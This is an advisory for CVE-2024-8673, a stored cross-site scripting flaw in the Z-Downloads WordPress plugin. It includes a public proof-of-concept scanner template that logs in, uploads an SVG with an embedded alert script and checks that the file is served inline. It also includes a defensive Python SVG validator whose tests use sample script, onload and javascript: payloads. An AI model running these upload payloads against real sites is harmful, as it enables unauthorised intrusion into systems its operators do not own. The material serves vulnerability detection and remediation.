CVE-2024-8673: Z-Downloads < 1.11.7 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: Z-Downloads | PoC: public

Vulnerability description

The plugin does not properly validate uploaded files, allowing an authenticated user to upload SVG files containing malicious JavaScript. The uploaded file is then served from wp-content/uploads with Content-Type: image/svg+xml, so the embedded script executes in the site's origin when anyone opens the file's URL (stored XSS). Fixed in version 1.11.7.

PoC code [public]

id: CVE-2024-8673

info:
  name: Z-Downloads < 1.11.7 - Cross-Site Scripting
  author: Splint3r7
  severity: low
  description: |
    The plugin does not properly validate uploaded files allowing for the uploading of SVGs containing malicious JavaScript.
  remediation: Fixed in version 1.11.7
  reference:
    - https://wpscan.com/vulnerability/fed2cd26-7ccb-419d-b589-978410953bf4/
  classification:
    cve-id: CVE-2024-8673
    cvss-score: 3.5
    cwe-id: CWE-79
    epss-score: 0.06683
    epss-percentile: 0.90882
  metadata:
    verified: true
    max-request: 5
    framework: wordpress
  tags: cve,cve2024,wpscan,wp-plugin,wp,authenticated,wordpress,z-downloads,vuln

# Stage 1 must succeed (login + nonce extraction) before stage 2 uploads the file.
flow: http(1) && http(2)

http:
  - raw:
      # Authenticate to obtain the WordPress session cookie.
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      # Load the upload form to harvest the nonce the upload handler expects.
      - |
        GET /wp-admin/admin.php?page=z-downloads-add-file HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - name="nonce" value="([0-9a-zA-Z]+)"
        internal: true

  - raw:
      # Upload the SVG; the plugin accepts it without inspecting the contents.
      - |
        POST /wp-admin/admin.php?page=z-downloads-files HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------191511049038951322013765412437

        -----------------------------191511049038951322013765412437
        Content-Disposition: form-data; name="file"; filename="xss.svg"
        Content-Type: image/svg+xml
        <svg xmlns="http://www.w3.org/2000/svg">
        <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
        <script type="text/javascript">alert(document.domain);</script>
        </svg>

        -----------------------------191511049038951322013765412437
        Content-Disposition: form-data; name="nonce"

        {{nonce}}
        -----------------------------191511049038951322013765412437
        Content-Disposition: form-data; name="submit"

        Upload
        -----------------------------191511049038951322013765412437--

      # List the files to learn the randomised upload path of xss.svg.
      - |
        GET /wp-admin/admin.php?page=z-downloads-files HTTP/1.1
        Host: {{Hostname}}

      # Fetch the stored file; it is served inline as image/svg+xml with the script intact.
      - |
        GET /{{payloadurl}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_5 == 200
          - contains(content_type_5, "image/svg+xml")
          - contains(body_5, "<script type=\"text/javascript\">alert(document.domain);</script>")
        condition: and

    extractors:
      - type: regex
        name: payloadurl
        part: body
        regex:
          - /wp-content/uploads/z-downloads-[a-f0-9]{32}/files/[a-f0-9]{32}/xss\.svg
        internal: true
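The check the plugin lacked before 1.11.7 is a server-side inspection of the SVG before it is stored. The following is an added example of such a validator, not code from Z-Downloads or WordPress: it parses the upload as XML and refuses anything that executes or loads content when the file is later rendered inline as image/svg+xml. The element and attribute lists, the size limit and the four sample documents are this example's own assumptions; POC_SVG mirrors the payload shape used in the PoC above.

```python
"""Reject SVG uploads that carry active content (added example, not plugin code).

An SVG served inline as image/svg+xml is a full XML document: <script>, on*
event handlers, javascript: hrefs, foreignObject and CSS url()/@import all run
or load content in the serving site's origin. The allow/deny lists below are
an illustrative assumption, not a complete SVG hardening specification.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Elements that execute script, embed foreign documents, or can rewrite
# attributes at render time (e.g. <set attributeName="href" to="javascript:...">).
FORBIDDEN_ELEMENTS = {
    "script", "foreignObject", "iframe", "embed", "object", "handler",
    "listener", "set", "animate", "animateTransform", "animateMotion",
}
# href / xlink:href may only point at a same-document fragment or an inline
# raster image; javascript:, http(s): and data:image/svg+xml are refused.
SAFE_HREF = re.compile(r"^\s*(#\S*|data:image/(png|jpe?g|gif|webp);base64,)", re.I)
CSS_EXTERNAL = re.compile(r"url\s*\(|@import|expression\s*\(", re.I)
# Textual pre-checks applied before the bytes reach an XML parser: no DTD or
# entity declarations (entity-expansion tricks) and no stylesheet PIs.
RAW_MARKERS = (b"<!doctype", b"<!entity", b"<?xml-stylesheet")


def _split(qname: str) -> tuple[str, str]:
    """Split ElementTree's '{namespace}local' form into (namespace, local)."""
    if qname.startswith("{"):
        ns, local = qname[1:].split("}", 1)
        return ns, local
    return "", qname


def validate_svg(data: bytes, max_bytes: int = 1_000_000) -> list[str]:
    """Return the reasons an uploaded SVG must be rejected; [] means it passed."""
    if len(data) > max_bytes:
        return [f"file exceeds {max_bytes} bytes"]
    lowered = data.lower()
    problems = [f"forbidden construct {m.decode()}" for m in RAW_MARKERS if m in lowered]
    if problems:
        return problems
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        problems.append(f"root element {root.tag!r} is not an SVG document")
    for elem in root.iter():
        ns, local = _split(elem.tag)
        if ns != SVG_NS:
            problems.append(f"element <{local}> outside the SVG namespace")
        if local in FORBIDDEN_ELEMENTS:
            problems.append(f"forbidden element <{local}>")
        if local == "style" and CSS_EXTERNAL.search(elem.text or ""):
            problems.append("<style> uses url()/@import/expression()")
        for attr, value in elem.attrib.items():
            _, alocal = _split(attr)  # covers both href and xlink:href
            if alocal.lower().startswith("on"):
                problems.append(f"event handler {alocal} on <{local}>")
            elif alocal == "href" and not SAFE_HREF.match(value):
                problems.append(f"unsafe href on <{local}>: {value[:40]!r}")
            elif alocal == "style" and CSS_EXTERNAL.search(value):
                problems.append(f"style attribute on <{local}> uses url()/@import")
    return problems


def is_safe_svg(data: bytes) -> bool:
    return not validate_svg(data)


# Constructed samples for this example. POC_SVG mirrors the PoC payload shape.
POC_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert(document.domain);</script>
</svg>"""
HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
<circle r="10"/></svg>"""
JSHREF_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<a xlink:href="javascript:alert(document.domain)"><text y="20">click</text></a></svg>"""
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
<defs><polygon id="tri" points="0,0 0,50 50,0" fill="#009900"/></defs>
<use href="#tri"/></svg>"""

if __name__ == "__main__":
    for name, doc in [("poc", POC_SVG), ("handler", HANDLER_SVG),
                      ("jshref", JSHREF_SVG), ("benign", BENIGN_SVG)]:
        print(name, validate_svg(doc) or "accepted")
```

Validation at upload time is the fix the advisory describes; as defence in depth, serving the uploads directory with Content-Disposition: attachment, or with a Content-Security-Policy of script-src 'none', stops an SVG that slips through from executing in the site's origin, because the matcher above only fires when the file is rendered inline as image/svg+xml.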
